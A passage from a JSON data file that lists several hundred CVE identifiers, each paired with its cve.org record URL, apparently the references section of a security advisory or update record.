"url": "https://www.cve.org/CVERecord?id=CVE-2025-38375"
},
{
"name": "CVE-2023-54213",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54213"
},
{
"name": "CVE-2023-54096",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54096"
},
{
"name": "CVE-2022-50636",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50636"
},
{
"name": "CVE-2025-39913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39913"
},
{
"name": "CVE-2025-38591",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38591"
},
{
"name": "CVE-2025-71098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71098"
},
{
"name": "CVE-2025-71078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71078"
},
{
"name": "CVE-2025-40355",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40355"
},
{
"name": "CVE-2023-53837",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53837"
},
{
"name": "CVE-2023-54049",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54049"
},
{
"name": "CVE-2024-36357",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36357"
},
{
"name": "CVE-2025-71083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71083"
},
{
"name": "CVE-2025-40115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40115"
},
{
"name": "CVE-2024-54031",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54031"
},
{
"name": "CVE-2025-68813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68813"
},
{
"name": "CVE-2023-54315",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54315"
},
{
"name": "CVE-2023-54010",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54010"
},
{
"name": "CVE-2022-50774",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50774"
},
{
"name": "CVE-2025-39689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39689"
},
{
"name": "CVE-2022-50878",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50878"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2023-54211",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54211"
},
{
"name": "CVE-2022-50836",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50836"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2023-54156",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54156"
},
{
"name": "CVE-2022-50644",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50644"
},
{
"name": "CVE-2022-50846",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50846"
},
{
"name": "CVE-2023-54098",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54098"
},
{
"name": "CVE-2025-71076",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71076"
},
{
"name": "CVE-2022-50842",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50842"
},
{
"name": "CVE-2025-71154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71154"
},
{
"name": "CVE-2023-54275",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54275"
},
{
"name": "CVE-2023-52923",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52923"
},
{
"name": "CVE-2025-40198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40198"
},
{
"name": "CVE-2022-50668",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50668"
},
{
"name": "CVE-2023-53818",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53818"
},
{
"name": "CVE-2024-26661",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26661"
},
{
"name": "CVE-2025-71084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71084"
},
{
"name": "CVE-2022-50840",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50840"
},
{
"name": "CVE-2023-54305",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54305"
},
{
"name": "CVE-2022-50756",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50756"
},
{
"name": "CVE-2023-54150",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54150"
},
{
"name": "CVE-2023-54199",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54199"
},
{
"name": "CVE-2025-68770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68770"
},
{
"name": "CVE-2025-40202",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40202"
},
{
"name": "CVE-2025-68814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68814"
},
{
"name": "CVE-2025-38565",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38565"
},
{
"name": "CVE-2024-26581",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26581"
},
{
"name": "CVE-2025-71081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71081"
},
{
"name": "CVE-2023-52433",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52433"
},
{
"name": "CVE-2022-50700",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50700"
},
{
"name": "CVE-2022-50821",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50821"
},
{
"name": "CVE-2024-41007",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41007"
},
{
"name": "CVE-2025-38159",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38159"
},
{
"name": "CVE-2023-54110",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54110"
},
{
"name": "CVE-2022-50816",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50816"
},
{
"name": "CVE-2022-50881",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50881"
},
{
"name": "CVE-2025-37744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37744"
},
{
"name": "CVE-2023-54205",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54205"
},
{
"name": "CVE-2023-53866",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53866"
},
{
"name": "CVE-2023-53792",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53792"
},
{
"name": "CVE-2025-40256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40256"
},
{
"name": "CVE-2025-71080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71080"
},
{
"name": "CVE-2025-71142",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71142"
},
{
"name": "CVE-2024-56721",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56721"
},
{
"name": "CVE-2025-71136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71136"
},
{
"name": "CVE-2025-68354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68354"
},
{
"name": "CVE-2025-68801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68801"
},
{
"name": "CVE-2025-38068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38068"
},
{
"name": "CVE-2022-50724",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50724"
},
{
"name": "CVE-2022-50633",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50633"
},
{
"name": "CVE-2025-40097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40097"
},
{
"name": "CVE-2022-50859",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50859"
},
{
"name": "CVE-2022-50750",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50750"
},
{
"name": "CVE-2022-50726",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50726"
},
{
"name": "CVE-2022-50814",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50814"
},
{
"name": "CVE-2023-54040",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54040"
},
{
"name": "CVE-2025-71138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71138"
},
{
"name": "CVE-2023-54214",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54214"
},
{
"name": "CVE-2025-40233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40233"
},
{
"name": "CVE-2023-53148",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53148"
},
{
"name": "CVE-2023-54090",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54090"
},
{
"name": "CVE-2025-40271",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40271"
},
{
"name": "CVE-2023-53755",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53755"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2023-54079",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54079"
},
{
"name": "CVE-2023-54048",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54048"
},
{
"name": "CVE-2023-54202",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54202"
},
{
"name": "CVE-2023-54007",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54007"
},
{
"name": "CVE-2023-54024",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54024"
},
{
"name": "CVE-2024-50040",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50040"
},
{
"name": "CVE-2022-50781",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50781"
},
{
"name": "CVE-2022-50860",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50860"
},
{
"name": "CVE-2022-50780",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50780"
},
{
"name": "CVE-2022-50649",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50649"
},
{
"name": "CVE-2025-21764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21764"
},
{
"name": "CVE-2025-68190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68190"
},
{
"name": "CVE-2022-50829",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50829"
},
{
"name": "CVE-2023-54064",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54064"
},
{
"name": "CVE-2023-54153",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54153"
},
{
"name": "CVE-2022-50830",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50830"
},
{
"name": "CVE-2022-50673",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50673"
},
{
"name": "CVE-2023-54274",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54274"
},
{
"name": "CVE-2022-50666",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50666"
},
{
"name": "CVE-2025-40238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40238"
},
{
"name": "CVE-2023-54108",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54108"
},
{
"name": "CVE-2022-50745",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50745"
},
{
"name": "CVE-2025-21766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21766"
},
{
"name": "CVE-2025-40277",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40277"
},
{
"name": "CVE-2023-54317",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54317"
},
{
"name": "CVE-2025-37813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37813"
},
{
"name": "CVE-2022-50736",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50736"
},
{
"name": "CVE-2025-40106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40106"
},
{
"name": "CVE-2022-50740",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50740"
},
{
"name": "CVE-2025-68174",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68174"
},
{
"name": "CVE-2022-50329",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50329"
},
{
"name": "CVE-2023-54298",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54298"
},
{
"name": "CVE-2025-71093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71093"
},
{
"name": "CVE-2022-50822",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50822"
},
{
"name": "CVE-2025-40136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40136"
},
{
"name": "CVE-2023-53834",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53834"
},
{
"name": "CVE-2023-54053",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54053"
},
{
"name": "CVE-2022-50843",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50843"
},
{
"name": "CVE-2022-50769",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50769"
},
{
"name": "CVE-2025-40345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40345"
},
{
"name": "CVE-2023-54295",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54295"
},
{
"name": "CVE-2022-50752",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50752"
},
{
"name": "CVE-2023-54170",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54170"
},
{
"name": "CVE-2023-53781",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53781"
},
{
"name": "CVE-2024-42103",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42103"
},
{
"name": "CVE-2025-68733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68733"
},
{
"name": "CVE-2026-23005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23005"
},
{
"name": "CVE-2025-68215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68215"
},
{
"name": "CVE-2025-68188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68188"
},
{
"name": "CVE-2025-71079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71079"
},
{
"name": "CVE-2023-53418",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53418"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2022-50716",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50716"
},
{
"name": "CVE-2022-50698",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50698"
},
{
"name": "CVE-2022-50844",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50844"
},
{
"name": "CVE-2025-39977",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39977"
},
{
"name": "CVE-2023-54045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54045"
},
{
"name": "CVE-2023-54179",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54179"
},
{
"name": "CVE-2022-50773",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50773"
},
{
"name": "CVE-2022-50758",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50758"
},
{
"name": "CVE-2022-50848",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50848"
},
{
"name": "CVE-2024-36348",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36348"
},
{
"name": "CVE-2023-54289",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54289"
},
{
"name": "CVE-2022-50662",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50662"
},
{
"name": "CVE-2023-54177",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54177"
},
{
"name": "CVE-2023-54243",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54243"
},
{
"name": "CVE-2023-54078",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54078"
},
{
"name": "CVE-2022-50819",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50819"
},
{
"name": "CVE-2025-71143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71143"
},
{
"name": "CVE-2025-68768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68768"
},
{
"name": "CVE-2025-71130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71130"
},
{
"name": "CVE-2023-54013",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54013"
},
{
"name": "CVE-2023-54102",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54102"
},
{
"name": "CVE-2023-52983",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52983"
},
{
"name": "CVE-2025-68808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68808"
},
{
"name": "CVE-2024-27005",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27005"
},
{
"name": "CVE-2024-26935",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26935"
},
{
"name": "CVE-2025-68783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68783"
},
{
"name": "CVE-2025-71147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71147"
},
{
"name": "CVE-2023-53802",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53802"
},
{
"name": "CVE-2022-50887",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50887"
},
{
"name": "CVE-2022-50757",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50757"
},
{
"name": "CVE-2022-0854",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0854"
},
{
"name": "CVE-2022-50827",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50827"
},
{
"name": "CVE-2023-54166",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54166"
},
{
"name": "CVE-2025-38602",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38602"
},
{
"name": "CVE-2025-68797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68797"
},
{
"name": "CVE-2023-53820",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53820"
},
{
"name": "CVE-2023-54136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54136"
},
{
"name": "CVE-2025-38007",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38007"
},
{
"name": "CVE-2025-40088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40088"
},
{
"name": "CVE-2022-50679",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50679"
},
{
"name": "CVE-2025-40220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40220"
},
{
"name": "CVE-2025-40257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40257"
},
{
"name": "CVE-2025-21760",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21760"
},
{
"name": "CVE-2024-26832",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26832"
},
{
"name": "CVE-2026-23006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23006"
},
{
"name": "CVE-2022-50839",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50839"
},
{
"name": "CVE-2025-71108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71108"
},
{
"name": "CVE-2023-54301",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54301"
},
{
"name": "CVE-2025-68789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68789"
},
{
"name": "CVE-2025-68312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68312"
},
{
"name": "CVE-2025-68284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68284"
},
{
"name": "CVE-2025-38379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38379"
},
{
"name": "CVE-2022-50744",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50744"
},
{
"name": "CVE-2023-54277",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54277"
},
{
"name": "CVE-2023-53844",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53844"
},
{
"name": "CVE-2025-68183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68183"
},
{
"name": "CVE-2025-68774",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68774"
},
{
"name": "CVE-2023-54046",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54046"
},
{
"name": "CVE-2022-50717",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50717"
},
{
"name": "CVE-2023-54120",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54120"
},
{
"name": "CVE-2023-54026",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54026"
},
{
"name": "CVE-2022-50742",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50742"
},
{
"name": "CVE-2025-38656",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38656"
},
{
"name": "CVE-2025-71157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71157"
},
{
"name": "CVE-2023-53783",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53783"
},
{
"name": "CVE-2024-56690",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56690"
},
{
"name": "CVE-2023-54028",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54028"
},
{
"name": "CVE-2023-53858",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53858"
},
{
"name": "CVE-2023-53992",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53992"
},
{
"name": "CVE-2022-50722",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50722"
},
{
"name": "CVE-2022-50709",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50709"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2022-50728",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50728"
},
{
"name": "CVE-2022-50677",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50677"
},
{
"name": "CVE-2023-54266",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54266"
},
{
"name": "CVE-2025-71082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71082"
},
{
"name": "CVE-2023-53825",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53825"
},
{
"name": "CVE-2023-54003",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54003"
},
{
"name": "CVE-2025-71132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71132"
},
{
"name": "CVE-2023-54072",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54072"
},
{
"name": "CVE-2025-38322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38322"
},
{
"name": "CVE-2023-54134",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54134"
},
{
"name": "CVE-2025-71077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71077"
},
{
"name": "CVE-2023-54321",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54321"
},
{
"name": "CVE-2023-53744",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53744"
},
{
"name": "CVE-2023-53178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53178"
},
{
"name": "CVE-2023-23559",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23559"
},
{
"name": "CVE-2022-50718",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50718"
},
{
"name": "CVE-2022-50658",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50658"
},
{
"name": "CVE-2023-54009",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54009"
},
{
"name": "CVE-2025-71114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71114"
},
{
"name": "CVE-2022-50660",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50660"
},
{
"name": "CVE-2024-50143",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50143"
},
{
"name": "CVE-2025-68320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68320"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2022-50886",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50886"
},
{
"name": "CVE-2026-23000",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23000"
},
{
"name": "CVE-2023-54097",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54097"
},
{
"name": "CVE-2024-53149",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53149"
},
{
"name": "CVE-2022-50626",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50626"
},
{
"name": "CVE-2022-50767",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50767"
},
{
"name": "CVE-2023-53853",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53853"
},
{
"name": "CVE-2025-68325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68325"
},
{
"name": "CVE-2022-50880",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50880"
},
{
"name": "CVE-2025-71089",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71089"
},
{
"name": "CVE-2022-48838",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48838"
},
{
"name": "CVE-2022-50885",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50885"
},
{
"name": "CVE-2023-53766",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53766"
},
{
"name": "CVE-2022-49980",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49980"
},
{
"name": "CVE-2023-53840",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53840"
},
{
"name": "CVE-2025-68296",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68296"
},
{
"name": "CVE-2025-40328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40328"
},
{
"name": "CVE-2023-53464",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53464"
},
{
"name": "CVE-2022-50661",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50661"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2023-54284",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54284"
},
{
"name": "CVE-2022-50824",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50824"
},
{
"name": "CVE-2025-71141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71141"
},
{
"name": "CVE-2025-40177",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40177"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2022-50623",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50623"
},
{
"name": "CVE-2025-71101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71101"
},
{
"name": "CVE-2025-40264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40264"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-68367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68367"
},
{
"name": "CVE-2025-68820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68820"
},
{
"name": "CVE-2023-53788",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53788"
},
{
"name": "CVE-2022-50580",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50580"
},
{
"name": "CVE-2023-53215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53215"
},
{
"name": "CVE-2023-54207",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54207"
},
{
"name": "CVE-2024-28956",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28956"
},
{
"name": "CVE-2025-68740",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68740"
},
{
"name": "CVE-2022-50864",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50864"
},
{
"name": "CVE-2023-53832",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53832"
},
{
"name": "CVE-2023-53819",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53819"
},
{
"name": "CVE-2022-50715",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50715"
},
{
"name": "CVE-2022-50735",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50735"
},
{
"name": "CVE-2025-68816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68816"
},
{
"name": "CVE-2025-68192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68192"
},
{
"name": "CVE-2023-54092",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54092"
},
{
"name": "CVE-2025-68379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68379"
},
{
"name": "CVE-2025-68256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68256"
},
{
"name": "CVE-2025-68777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68777"
},
{
"name": "CVE-2025-68254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68254"
},
{
"name": "CVE-2025-71145",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71145"
},
{
"name": "CVE-2025-68171",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68171"
},
{
"name": "CVE-2023-54015",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54015"
},
{
"name": "CVE-2025-22047",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22047"
},
{
"name": "CVE-2023-54122",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54122"
},
{
"name": "CVE-2023-54119",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54119"
},
{
"name": "CVE-2022-50675",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50675"
},
{
"name": "CVE-2023-54159",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54159"
},
{
"name": "CVE-2022-50751",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50751"
},
{
"name": "CVE-2025-71118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71118"
},
{
"name": "CVE-2023-54245",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54245"
},
{
"name": "CVE-2022-50347",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50347"
},
{
"name": "CVE-2023-54168",
